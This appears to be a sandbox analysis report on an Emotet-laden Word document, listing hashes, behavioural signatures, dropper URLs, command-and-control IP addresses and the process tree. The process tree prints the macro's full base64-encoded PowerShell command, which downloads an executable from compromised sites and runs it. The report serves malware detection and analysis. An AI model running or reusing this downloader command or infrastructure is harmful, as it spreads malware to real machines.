Overview

overview

10

Static

static

8

emotet_doc

windows7_x64

10

Analysis

  • max time kernel
    23s
  • max time network
    35s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    29-07-2020 06:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    445eac6a0537d629f9fb1564dfedbe24fcd73cd97034d53ef2257ddfc9a2a0ae.doc

  • Size

    173KB

  • MD5

    f6f6b714cf2713a49b7733f3cd402957

  • SHA1

    78d1960925c523c20ab4d38b98593a5d9663aa2e

  • SHA256

    445eac6a0537d629f9fb1564dfedbe24fcd73cd97034d53ef2257ddfc9a2a0ae

  • SHA512

    e7612c80911ae4b59cea5095834acd3758642bdd17216d02d49f8589e7f1888922c1e22980409d7bf23984e5fdc78995ada3fe9e2e4f73375193a03a7972d90d

Score
10/10
trojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://whateverest.ch/meditationes/4Pdv9304pyj8191258/
exe.dropper

http://signworld.nl/website-ivo-2019/nRxK/
exe.dropper

http://grieta.net/cgi-bin/rzXeV/
exe.dropper

http://itcnt.com.np/wp-admin/AXc/
exe.dropper

http://intere.com.br/erros/trdodu31307815/

Extracted

Family

emotet

C2

177.37.81.212:443

74.207.230.187:8080

190.164.75.175:80

87.252.100.28:80

105.209.239.55:80

163.172.107.70:8080

37.208.106.146:8080

24.157.25.203:80

212.112.113.235:80

140.207.113.106:443

75.139.38.211:80

192.210.217.94:8080

46.49.124.53:80

75.127.14.170:8080

87.106.231.60:8080

139.59.12.63:8080

181.167.35.84:80

201.214.108.231:80

74.208.173.91:8080

189.146.1.78:443
rsa_pubkey.plain

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Emotet Payload 1 IoCs

    Detects Emotet payload in memory.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 280 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

    trojanbankeremotet

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\445eac6a0537d629f9fb1564dfedbe24fcd73cd97034d53ef2257ddfc9a2a0ae.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:112
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABTAEQAVQBRAFgAagB5AGcAPQAnAFIASABPAEkAUQBpAGoAcwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBDAGAAVQBSAEkAdABZAFAAUgBPAGAAVABgAG8AQwBPAGwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABXAEUAWABEAEQAawBjAGEAIAA9ACAAJwA3ADIAMQAnADsAJABFAEcAVQBYAEYAaQBiAHEAPQAnAFkASABXAEkASQBjAGkAeQAnADsAJABEAFIAVgBFAFkAbgBzAG4APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFcARQBYAEQARABrAGMAYQArACcALgBlAHgAZQAnADsAJABOAFQATABGAFMAbgBiAGYAPQAnAE4ATgBPAFUASwBzAGEAdgAnADsAJABTAFgARgBSAEwAZAB3AGoAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAG4AZQB0AC4AdwBlAEIAQwBsAEkARQBOAFQAOwAkAEkARQBJAFAAUwB6AHkAdQA9ACcAaAB0AHQAcAA6AC8ALwB3AGgAYQB0AGUAdgBlAHIAZQBzAHQALgBjAGgALwBtAGUAZABpAHQAYQB0AGkAbwBuAGUAcwAvADQAUABkAHYAOQAzADAANABwAHkAagA4ADEAOQAxADIANQA4AC8AKgBoAHQAdABwADoALwAvAHMAaQBnAG4AdwBvAHIAbABkAC4AbgBsAC8AdwBlAGIAcwBpAHQAZQAtAGkAdgBvAC0AMgAwADEAOQAvAG4AUgB4AEsALwAqAGgAdAB0AHAAOgAvAC8AZwByAGkAZQB0AGEALgBuAGUAdAAvAGMAZwBpAC0AYgBpAG4ALwByAHoAWABlAFYALwAqAGgAdAB0AHAAOgAvAC8AaQB0AGMAbgB0AC4AYwBvAG0ALgBuAHAALwB3AHAALQBhAGQAbQBpAG4ALwBBAFgAYwAvACoAaAB0AHQAcAA6AC8ALwBpAG4AdABlAHIAZQAuAGMAbwBtAC4AYgByAC8AZQByAHIAbwBzAC8AdAByAGQAbwBkAHUAMwAxADMAMAA3ADgAMQA1AC8AJwAuACIAcwBwAGAAbABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABZAEcAUABIAFYAdABjAGkAPQAnAFYAWQBHAEYASQBrAGoAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQAQwBLAEgASwBJAHgAYgBjACAAaQBuACAAJABJAEUASQBQAFMAegB5AHUAKQB7AHQAcgB5AHsAJABTAFgARgBSAEwAZAB3AGoALgAiAGQAYABPAFcATgBMAG8AQQBEAGAARgBpAEwARQAiACgAJABDAEsASABLAEkAeABiAGMALAAgACQARABSAFYARQBZAG4AcwBuACkAOwAkAFAAWgBPAEcAVgB6AGcAbwA9ACcASABEAFcARQBJAG0AbgBrACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQAnACsAJwBJAHQAJwArACcAZQBtACcAKQAgACQARABSAFYARQBZAG4AcwBuACkALgAiAGwARQBgAE4AYABnAHQAaAAiACAALQBnAGUAIAAzADMANQA4ADgAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAEMAUgBFAGEAYABUAEUAIgAoACQARABSAFYARQBZAG4AcwBuACkAOwAkAEcAWABTAEMASwB2AGYAZwA9ACcASQBGAEUATABHAHMAawB3ACcAOwBiAHIAZQBhAGsAOwAkAFIATABQAEIASABwAHUAZQA9ACcAUgBRAFUAUwBZAHMAeQB5ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFgAVwBEAEwAUABzAGsAZwA9ACcARABSAFEATABYAHEAbgBzACcA
    1⤵
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    • Blacklisted process makes network request
    • Suspicious use of AdjustPrivilegeToken
    • Drops file in System32 directory
    PID:1844
  • C:\Users\Admin\721.exe
    C:\Users\Admin\721.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    • Suspicious use of SetWindowsHookEx
    • Drops file in System32 directory
    PID:1784
    • C:\Windows\SysWOW64\wiashext\Wpc.exe
      "C:\Windows\SysWOW64\wiashext\Wpc.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:1576

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/112-2-0x0000000008A40000-0x0000000008A44000-memory.dmp

    Filesize

    16KB

    Download

  • memory/112-4-0x00000000070D0000-0x00000000072D0000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/112-5-0x000000000AED0000-0x000000000AED4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/112-6-0x000000000BF50000-0x000000000BF54000-memory.dmp

    Filesize

    16KB

    Download

  • memory/112-9-0x0000000002100000-0x0000000002101000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1784-12-0x00000000003B0000-0x00000000003BC000-memory.dmp

    Filesize

    48KB

    Download